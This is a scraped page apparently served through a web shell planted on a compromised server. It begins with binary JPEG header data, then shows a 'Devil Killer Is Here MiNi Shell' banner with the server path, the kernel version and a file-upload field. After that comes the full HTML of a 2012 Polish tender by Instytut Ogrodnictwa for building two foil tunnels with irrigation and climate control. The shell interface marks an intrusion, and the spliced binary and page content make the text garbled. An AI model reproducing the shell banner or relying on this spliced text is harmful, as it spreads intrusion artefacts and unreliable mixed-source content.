JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120319/84964-N-2012.html

<p class="kh_header"><b>Skierniewice: Budowa tuneli nieogrzewanych - 2 szt</b><br>
<b>Numer ogłoszenia: 84964 - 2012; data zamieszczenia: 19.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Ogrodnictwa , ul. Konstytucji 3 Maja 1/3, 96-100 Skierniewice, woj. łódzkie, tel. 46 833 20 21, faks 46 833 32 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.inhort.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa tuneli nieogrzewanych - 2 szt.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie i wykonanie 2 szt. tuneli foliowych wraz z wyposażeniem, a w szczególności:
- sporządzenie projektu budowlanego,
- uzyskanie wszelkich niezbędnych uzgodnień i decyzji wraz z pozwoleniem na budowę,
- sporządzenie projektów wykonawczych i kosztorysu uproszczonego,
- kompleksowe wykonanie pełnego zakresu zadania w oparciu o sporządzone projekty.
Szczegółowy opis techniczny zadania obejmuje Program Funkcjonalno-Użytkowy stanowiący załącznik nr 1 do SIWZ.

Zadanie obejmuje fazę projektową oraz fazę wykonawczą i będzie realizowane w trzech niżej opisanych etapach:

Etap I 
1.	Opracowanie pełnobranżowego projektu budowlanego i instalacyjnego wraz z projektem zagospodarowania terenu w zakresie niezbędnym do uzyskania pozwolenia na budowę i niezbędnym do realizacji robót budowlanych - po 6 egzemplarzy każdej branży w wersji papierowej i 1 egzemplarz w wersji elektronicznej w formacie zapisu i PDF.
2.	Sporządzenie projektów wykonawczych uzupełniających i uszczegóławiających projekt budowlany w zakresie i stopniu dokładności niezbędnym do realizacji robót budowlanych (we wszystkich branżach) - po 2 egzemplarze każdej branży w wersji papierowej i 1 egzemplarz w wersji elektronicznej w formacie zapisu i PDF.
3.	Sporządzenie kosztorysu uproszczonego - po 2 egzemplarze każdej branży w wersji papierowej i 1 egzemplarz w wersji elektronicznej w formacie zapisu i PDF.
4.	Sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (IBIOZ).
5.	Uzyskanie niezbędnych pozwoleń, uzgodnień i decyzji administracyjnych wraz z ostateczną decyzją o pozwoleniu na budowę.

Etap II  -  40% wartości robót budowlanych i instalacyjnych

Etap III  -  60% wartości robót budowlanych i instalacyjnych

Etap II i III obejmuje budowę 2 szt. tuneli foliowych nieogrzewanych o wskazanych parametrach lub lepszych:

Tunel foliowy nr 1 - szt. 1 do upraw gruntowych lub w substratach na płask (bez instalacji wynoszącej tzn. rynny uprawowe, stoły itp.) papryki, pomidora oraz warzyw liściowych w okresie bezmroźnym III-XI (z możliwością okresowego zainstalowania mobilnej instalacji grzewczej typu nagrzewnica) o wymiarach:
- 	szerokość nawy				9,00 m
- 	długość					30,00 m
- 	wysokość całkowita			4,50 m
- 	wysokość do podciągów poprzecznych	3,00 m
-	wysokość ścian bocznych			2,50 m
-    rozstaw przęseł				2 mb
- 	liczba naw					1 szt.
- 	powierzchnia całkowita			270,00 m2
-    wytrzymałość na obciążenie wiatrem 	ok. 100 km/h
-    obciążenie śniegiem 			ok. 45 kg/m2

Konstrukcja:
-	stalowa, wszystkie elementy ocynkowane,
-	proste ściany boczne, łukowa część dachowa,
-	na styku odcinka prostego ściany i łuku dachu - rynny stalowe ocynkowane z odprowadzeniami pionowymi,
-	pokrycie dachu i boków pojedynczą folią antykondensacyjną, stabilizowaną UV (wytrzymałość folii - min. 5 sezonów) o przepuszczalności światła powyżej 90%, dyfuzyjności około 15%, grubości 150 ?m,
-	ściany szczytowe pokryte poliwęglanem komorowym,
-	drzwi przesuwne z poliwęglanu (2,5 m wysokości i 3,2 m szerokości),
-	przęsła tunelu osadzone na stopach betonowych z wpuszczonymi kotwami mocującymi i opaską betonową,
-	druty uprawowe z naciągami, rozpięte wszerz tunelu, na wysokości ok. 2,5 m (poniżej systemu zwijania siatki przeciwowadziej) w odstępach 1 m,
-	wietrznik górny: roleta obustronna - indywidualna dla każdej połaci dachowej, oś wietrznika w kalenicy, stopień otwarcia każdej rolety - do 50 % powierzchni dachu, otwieranie rolety niezależne na każdej połaci, roleta poruszająca się płynnie (otwieranie - w kierunku kalenicy), mechanizm zwijania rolety wyposażony w motoreduktory, możliwość automatycznego i manualnego włączania mechanizmu, otwieranie rolety na podstawie danych z komputera klimatycznego,
-	wietrznik boczny: roleta na obu ścianach, mocowanie rolety w części przyrynnowej, stopień otwarcia każdej rolety - do 100% powierzchni ściany, otwieranie rolety niezależne na każdej połaci, roleta poruszająca się płynnie (otwieranie - w kierunku rynny), mechanizm zwijania rolety wyposażony w motoreduktory, możliwość automatycznego i manualnego włączania mechanizmu.

Wyposażenie:
-	siatka entomologiczna biała (np. SP22 lub SP24 lub równoważna) zabezpieczająca przed migracją szkodników do wnętrza obiektu, wielkość oczek uniemożliwiająca migrację najmniejszych szkodników (wciornastek, przędziorek) - ok. 1mm x 1mm. Siatka zamontowana poziomo poniżej podciągów poprzecznych i pionowo na ścianach bocznych na mechanizmie zwijania/rozwijania typowym dla cieniówki/kurtyny,
-	system mikrozraszania/zamgławiania, przewody podwieszone na wys. ok. 2,5 m, przewody doprowadzające wodę do mikrozraszaczy, podwieszone na 	wysokości 2,5 m, mikrozraszacze z wkładką zamgławiającą i antykapaczem, liczba przewodów i mikrozraszaczy oraz zasięg mikrozraszaczy pozwalający na równomierne zamgławianie kubatury tunelu, przyłącze do zaworu czerpalnego w czołowej części tunelu (oddzielne dla każdego tunelu), możliwość automatycznego i manualnego sterowania instalacją,
-	instalacja nawadniająca naziemna: magistrale doprowadzające wodę do przewodów nawadniających ułożone wzdłuż jednej ściany tunelu, podłączenie każdej magistrali do zaworu czerpalnego w czołowej części tunelu, przewody nawadniające ułożone w poprzek tunelu, 30 linii (po 25 emiterów na każdej), przewody z zaworami odcinającymi dopływ z magistrali, emitery kroplowe typu CNL (bez emisji wody przy niskim ciśnieniu) z bagnetem labiryntowym,
-	wietrznik górny: roleta obustronna - indywidualna dla każdej połaci dachowej, oś wietrznika w kalenicy, stopień otwarcia każdej rolety - do 50% powierzchni dachu, otwieranie rolety niezależne na każdej połaci, roleta poruszająca się płynnie, mechanizm zwijania rolety wyposażony w motoreduktory, możliwość automatycznego i manualnego włączania mechanizmu, otwieranie rolety na podstawie danych z komputera klimatycznego,
-	wietrznik boczny: roleta na obu ścianach, oś rolety w części przyrynnowej, stopień otwarcia każdej rolety - do 100% powierzchni ściany, otwieranie rolety niezależne na każdej połaci, roleta poruszająca się płynnie, mechanizm zwijania rolety wyposażony w motoreduktory, możliwość automatycznego i manualnego włączania mechanizmu,
-	instalacje kablowe - zasilająca, pomiarowa i sterująca, (panele elektryczne obejmujące zabezpieczenia i elementy wykonawcze dla - 2 silników wietrzenia górnego, 2 silników wietrzenia bocznego, silnika mechanizmu siatki przeciwowadziej, silnika wentylatora pionowego), każdy z silników posiada przełącznik umożliwiający obsługę ręczną i sterowanie automatyczne, gniazda elektryczne z zabezpieczeniem przepięciowym,
-	drzwi przesuwne o wym. 2,50  x 3,20 m z poliwęglanu - 2 szt.,
-	druty uprawowe z naciągami, rozpięte wszerz tunelu, na wysokości ok. 2,5 m (poniżej systemu zwijania siatki przeciwowadziej) w odstępach 1 m,
-	komputer klimatyczny wspólny dla tunelu nr 1 i nr 2.

Tunel foliowy nr 2 - szt. 1 do upraw gruntowych lub w substratach na płask do zamontowania stołów ażurowych lub prostych, mobilnych stelaży pod wielodoniczki. Tunel przystosowany do uprawy w okresie bezmroźnym III-XI (z możliwością okresowego zainstalowania mobilnej instalacji grzewczej typu nagrzewnica) o wymiarach:
- 	szerokość nawy				9,00 m
- 	długość					30,00 m
- 	wysokość całkowita			4,50 m
- 	wysokość do podpory upraw		3,00 m
-	wysokość ścian bocznych			2,50 m
-   rozstaw przęseł				2 mb
- 	liczba naw					1 szt.
- 	powierzchnia całkowita			270,00 m2
-    wytrzymałość na obciążenie wiatrem 	ok. 100 km/h
-    obciążenie śniegiem 			ok. 45 kg/m2

Konstrukcja:
-	stalowa, wszystkie elementy ocynkowane,
-	proste ściany boczne, łukowa część dachowa,
-	na styku odcinka prostego ściany i łuku dachu - rynny stalowe ocynkowane z odprowadzeniami pionowymi,
-	pokrycie dachu pojedynczą folią antykondensacyjną, stabilizowaną UV (wytrzymałość folii - min. 5 sezonów) o przepuszczalności światła powyżej 90%, dyfuzyjności około 15%, grubości 150 ?m,
-	pokrycie boków podwójną folią pompowaną, folią antykondensacyjną, stabilizowaną UV (wytrzymałość folii - min. 5 sezonów) o przepuszczalności światła powyżej 90%, dyfuzyjności około 15%, grubości 150 ?m, poduszka powietrzna z możliwością spuszczania powietrza w okresie letnim i powtórnego pompowania na okres od jesieni do wiosny, mechanizm rolowanych ścian bocznych po spuszczeniu powietrza z poduszki,
-	ściany szczytowe pokryte poliwęglanem komorowym,
-	drzwi przesuwne z poliwęglanu (2,5 m wysokości i 3,2 m szerokości),
-	przęsła tunelu osadzone na stopie betonowej z wpuszczonym kotwem mocującym i opaską betonową,
-	wietrznik górny po jednej stronie kalenicy: wietrznik otwierający się od końca boku prostego, uruchamianie - silnik trójfazowy, otwieranie zmechanizowane i ręczne,
-	wietrznik boczny: roleta na obu ścianach (podwójna powłoka powstała po spuszczeniu powietrza z poduszki powietrznej, po okresie przymrozków) działająca w okresie letnim, bez międzypompowania, powtórne pompowanie rolety możliwe w okresie przymrozków jesiennych i utrzymywanie jej do wiosny, mocowanie rolety w części przyrynnowej, stopień otwarcia każdej rolety - do 100% powierzchni ściany, otwieranie rolety niezależne na każdej połaci, roleta poruszająca się płynnie, mechanizm zwijania rolety wyposażony w motoreduktory, możliwość automatycznego i manualnego włączania mechanizmu.

Wyposażenie:
-	siatka entomologiczna biała (np. SP22 lub SP24 lub równoważna) zabezpieczająca przed migracją szkodników do wnętrza obiektu, wielkość oczek uniemożliwiająca migrację najmniejszych szkodników (wciornastek, przędziorek) - ok. 1mm x 1mm. Siatka zamontowana w otworach wietrzników górnych (konstrukcyjnych) - na stałe i na ścianach - na prowadnicy linkowej (system dwóch linek poziomych - na dolnym i górnym poziomie prostego odcinka ściany), 
- cieniówka/kurtyna termoizolacyjna wewnętrzna (np. PH44 lub równoważna) z pasków aluminiowych i polietylenowych, 45% zacienienia i do 52 % oszczędności energii, linkowy system zwijania/rozwijania, 
-	system mikrozraszania/zamgławiania, przewody podwieszone na wys. ok. 2,5 m, przewody doprowadzające wodę do mikrozraszaczy, podwieszone na 	wysokości 2,5 m, mikrozraszacze z wkładką zamgławiającą i antykapaczem, liczba przewodów i mikrozraszaczy oraz zasięg mikrozraszaczy pozwalający na równomierne zamgławianie kubatury tunelu, przyłącze do zaworu czerpalnego w czołowej części tunelu (oddzielne dla każdego tunelu), możliwość automatycznego i manualnego sterowania instalacją,
-	instalacja nawadniająca naziemna: magistrale doprowadzające wodę do przewodów nawadniających ułożone wzdłuż jednej ściany tunelu, podłączenie każdej magistrali do zaworu czerpalnego w czołowej części tunelu,
-	przesuwne ramię zraszające z dyszami, zbiornikiem nawozów, z szyną do prowadzenia kabla zasilającego i węża, długość belki do 4,5 m, pasmo zraszania 4,5 m, wysokości od gruntu do wylotu dysz - 1,5 m - 2,0 m (możliwość regulacji wysokości), tor ruchu wzdłuż tunelu, możliwość obrotu belki o 180o w płaszczyźnie poziomej (wówczas prowadnica ramienia zainstalowana w podłużnej osi tunelu, na wys. min. 2 m), sterowanie ramieniem zraszającym automatyczne i manualne,
-	wietrznik górny po jednej stronie kalenicy: wietrznik otwierający się od końca boku prostego, uruchamianie - silnik trójfazowy, otwieranie zmechanizowane i ręczne,
-	wietrznik boczny: roleta na obu ścianach (podwójna powłoka powstała po spuszczeniu powietrza z poduszki powietrznej, po okresie przymrozków) działająca w okresie letnim, bez międzypompowania, powtórne pompowanie rolety możliwe w okresie przymrozków jesiennych i utrzymywanie jej do wiosny, oś rolety w części przyrynnowej, stopień otwarcia każdej rolety - do 100 % powierzchni ściany, otwieranie rolety niezależne na każdej połaci, roleta poruszająca się płynnie, mechanizm zwijania rolety wyposażony w motoreduktory, możliwość automatycznego i manualnego włączania mechanizmu,
-	instalacje kablowe - zasilająca, pomiarowa i sterująca, (panele elektryczne obejmujące zabezpieczenia i elementy wykonawcze dla - 2 silników wietrzenia górnego, 2 silników wietrzenia bocznego, silnika kurtyny/cieniówki, silnika wentylatora pionowego, silnika ramienia zraszającego), każdy z silników posiada przełącznik umożliwiający obsługę ręczną i sterowanie automatyczne, gniazda elektryczne z zabezpieczeniem przepięciowym,
-	drzwi przesuwne o wym. 2,50  x 3,20 m z poliwęglanu - 2 szt,
-	komputer klimatyczny wspólny dla tunelu nr 1 i nr 2.

Komputer klimatyczny dla tunelu 1 i 2 sterujący procesami: wietrzenia, pracą mechanizmu zwijania/ rozwijania siatki i kurtyny/cieniówki, instalacji zamgławiającej. Komputer klimatyczny z możliwością połączenia z komputerem typu PC z zainstalowanym oprogramowaniem, umożliwiającym wprowadzanie, przeglądanie i gromadzenie danych klimatycznych. Komputer będzie obsługiwał 2 tunele wolnostojące. Komputer powinien posiadać wyjścia sterujące dla:
-	wietrzenia górnego - 4 sygnały (2 sygnały dla każdego tunelu - po 1 dla każdej połaci dachowej),
-	wietrzenia boków - 4 sygnały (po 2 sygnały dla każdego tunelu - po 1 dla każdej ściany),
-	mechanizmu typowego dla kurtyny/cieniówki - 2 sygnały (po 1 sygnale dla każdego tunelu),
-	wentylatorów - 2 sygnały (po 1 sygnale dla każdego tunelu),
-	zamgławiania - 1 sygnał dla każdego tunelu,
-	ramienia zraszającego - 2 sygnały dla 1 tunelu.
Komputer powinien posiadać wejścia sterujące dla pomiaru temperatury i wilgotności w obu tunelach, wymagany eksport danych do Excela, archiwizacji danych - co najmniej 7 dni. Możliwość programowania - ustalania nowych parametrów. System ma pracować na systemie Windows 7.
Dane z komputera klimatycznego mają być przesyłane na komputer PC drogą radiową za pośrednictwem sieci Ethernet. Komputer PC znajduje się w odległość ok. 1 km od tuneli.
Komputer klimatyczny będzie współpracował ze stacją klimatyczną (dostawa Zamawiającego) wyposażoną w czujnik prędkości i kierunku wiatru, czujnik radiacji, czujnik temperatury i wilgotności powietrza, czujnik opadów deszczu, czujnik wilgotnego liścia - stacja jest wyposażeniem ściśle współpracującym z Komputerem sterującym klimatem w tunelach foliowych.
Stacja będzie podłączona do komputera klimatycznego przez firmę dostarczającą stację.

Kontener wolnostojący o powierzchni min. 15 m2 (wielkość dostosowana do instalacji wewnątrz) wykonany z płyty warstwowej, wysokość 2,6 - 2,8 m. Kontener wyposażony w:
- instalację elektryczną (oświetlenie, gniazda wtykowe),
- instalację grzewczą (grzejnik elektryczny),
- instalację wody użytkowej z sieci miejskiej z licznikiem poboru wody,
- umywalką (komora gospodarcza pralnicza o wymiarach ok. 70 x50x25cm, polipropylenowa 
lub kompozytowa),
- oknem (otwieralno-uchylnym) z zamkiem i kratą,
- drzwi z zamkiem patentowym i zabezpieczeniem antywłamaniowym.
W kontenerze należy zainstalować:
1.	Pompownię - z podłączeniem dla pomp dozujących (dozownik proporcjonalny) z filtrami i oprzyrządowaniem oraz jednym sterownikiem, pracujących w 2-4, niezależnych układach równoległych (po 2 dozowniki w każdym układzie). 
2.	Uzdatniacz wody z zasilaniem.
3.	Dodatkowy zbiornik na wodę - 6 m3.

Uzdatniacz wody z zasilaniem - odżelaziacz wraz z instalacją podłączeniową do źródła wody i instalacji rozprowadzającej wodę do nawodnień. Odżelazianie polegać ma na przemianie (przy udziale doprowadzonego do wody tlenu) związków łatwo rozpuszczalnych w związki trudno rozpuszczalne, które można wychwycić na piaskowym złożu filtracyjnym. Wychwycone w górnej części złoża związki żelaza będą okresowo usuwane poprzez zmianę kierunku przepływu wody oraz otworzenie zaworu popłucznego. 
Dane techniczne odżelaziacza; 
- realizacja procesu płukania sterowana ręcznie,
- butla stalowa o pojemności 500 dm3,
- wydajność 5,5 m3/h,
- wlot 5/4,
- odżelazienie wody do poziomu 0,3-0,5 mg/l.
Wymagania instalacji zasilającej:
- podłączenie do ujęcia wody wodociągowej
- podłączenie do instalacji rozprowadzającej wodę do systemów nawodnień kroplowych z 	możliwością prostego odłączenia odżelaziacza.

Woda deszczowa z tuneli rynnami będzie zbierana do systemu zbierania i drenażu wody deszczowej dla powierzchni zbiorczej do 800 m2 (przy średniej rocznej sumie opadu ok. 380 m3). Zbiorniki należy ustawić na zewnątrz w pobliżu tuneli. System musi składać się z:
-	zbiornik/ zbiorniki na wodę deszczową o pojemności ok. 11m3 (1 x 11 m3 lub 2 x 6 m3)
-	pokrywa/pokrywy zbiorników
-	dopływ(y) i odpływ(y) przelewowy
-	filtr(y) zbierający lub przepływowy
-	 rura(y) wznośna
-	pompa umożliwiająca dostarczenie wody do zraszaczy pod ciśnieniem wskazanym przez producenta zraszaczy z możliwością przełączenia między zbiornikami.

Instalacje dla tunelu nr 1 i 2:
- podłączenie wody z sieci miejskiej, Zamawiający doprowadzi przyłącze wody z sieci miejskiej do budynku kontenerowego z rury wodociągowej PE 50 x 4,6. W budynku kontenerowym zamontowany będzie przez Zamawiającego zawór odcinający i wodomierz.
- podłączenie energii elektrycznej (instalacja 230 V) kablem 5 x 6 mm2, rozdzielnia znajduje się w budynku, przyłącze należy poprowadzić z budynku po ścianie a następnie ziemią do pomieszczenia kontenerowego, cały system musi posiadać zasilanie podtrzymujące do 40 minut np. UPS.

Wykonawca będzie zobowiązany do:
1.	Wykonania dokumentacji projektowej zgodnie z obowiązującymi przepisami.
2.	Wykonania robót zgodnie z Prawem Budowlanym i obowiązującymi w tym zakresie przepisami, normami, warunkami technicznymi wykonania robót oraz zasadami sztuki budowlanej.
3.	Terminowej realizacji przedmiotu zadania.
4.	Prowadzenia wszystkich rodzajów robót przez osoby uprawnione zgodnie ze sztuką budowlaną, wiedzą techniczną oraz obowiązującymi przepisami prawnymi.
5.	Wyposażenia swoich pracowników oraz sprzętu w stosowne oznakowanie umożliwiające identyfikację w czasie prowadzenia robót.
6.	Wykonania robót zgodnie z dokumentacją projektową, obowiązującymi normami i wiedzą techniczną.
7.	Prowadzenia dokumentacji robót.
8.	Prowadzenie robót zgodnie z przepisami BHP oraz zgodnie z przepisami ppoż. 
9.	Terminowego przekazania Zamawiającemu przedmiotu zamówienia w stanie technicznym nadającym się do użytkowania zgodnie z wymogami Prawa Budowlanego wraz z wszelkimi dokumentami dopuszczającymi do użytkowania zgodnie z przeznaczeniem.
10.	Dostarczenia niezbędnych atestów, wyników oraz protokołów badań, sprawozdań i prób dotyczących realizowanego przedmiotu zamówienia.
11.	Okazania na żądanie Zamawiającego certyfikatu (deklaracji) zgodności z obowiązującymi normami lub w przypadku ich braku właściwą aprobatę techniczną w stosunku do wbudowanych materiałów.
12.	Wykonania BIOZ i tablicy informacyjnej.
13.	Usuwania na bieżąco usterek stwierdzonych w trakcie realizacji robót.
14.	Przestrzegania uwag jednostek uzgadniających, które są zawarte w dokumentacji technicznej.
15.	Usuwania wszelkich usterek stwierdzonych podczas odbiorów w terminach technicznie i organizacyjnie uzasadnionych.
16.	Przygotowania i przekazania Zamawiającemu dokumentacji powykonawczej w 2 egz. oraz inwentaryzacji geodezyjnej.

Opracowując dokumentację projektową należy na bieżąco uzgadniać z Zamawiającym przyjęte rozwiązania projektowe. Po opracowaniu całości dokumentacji należy ją przedstawić Zamawiającemu do akceptacji.

Wszystkie użyte materiały i urządzenia do wykonania przedmiotu zamówienia muszą być fabrycznie nowe.
Wszystkie nazwy własne użyte w specyfikacji i programie funkcjonalno-użytkowym oznaczają pożądany standard materiałów, a Zamawiający dopuszcza użycie materiałów równoważnych pod warunkiem, że posiadają parametry techniczne nie gorsze od wskazanych. Ciężar udowodnienia, że materiał jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające materiał do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne.
Wykonawca zobowiązany będzie do ustanowienia kierowników budowy w branży budowlanej i elektrycznej.
Wykonawca zobowiązany będzie do wykonania zakresu robót objętych SIWZ, programem funkcjonalno-użytkowym, wraz z pracami towarzyszącymi takimi, jak: przygotowanie terenu i zaplecza robót, uprzątniecie terenu robót po zakończonych pracach, itp.
Wykonawca pokryje we własnym zakresie koszty niezbędnych materiałów i usług.
Wykonawca udzieli 36 miesięcznej gwarancji na wykonane zadanie.
Zamawiający zabezpieczy Wykonawcy nieodpłatnie wodę i energię elektryczną dla potrzeb budowy.

Oferując cenę ryczałtową za wykonanie całości zadania Wykonawca podejmuje się wykonania wszystkich usług oraz robót koniecznych do wykonania zadania i winien przewidzieć w niej także koszty wykonania prac nie objętych programem funkcjonalno-użytkowym, a koniecznych do wykonania zamówienia.

Miejsce realizacji zamówienia: Instytut Ogrodnictwa, ul. Rybickiego 15/17.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.46.00-6, 45.22.31.00-7, 45.31.12.00-2, 45.33.20.00-3, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże że w okresie ostatnich 5 lat  przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej dwie roboty budowlane polegające na budowie tuneli foliowych z wyposażeniem szklarniowym (sterowanie klimatem, nawodnieniem, itp.) o powierzchni min. 500,00 m2 każda.
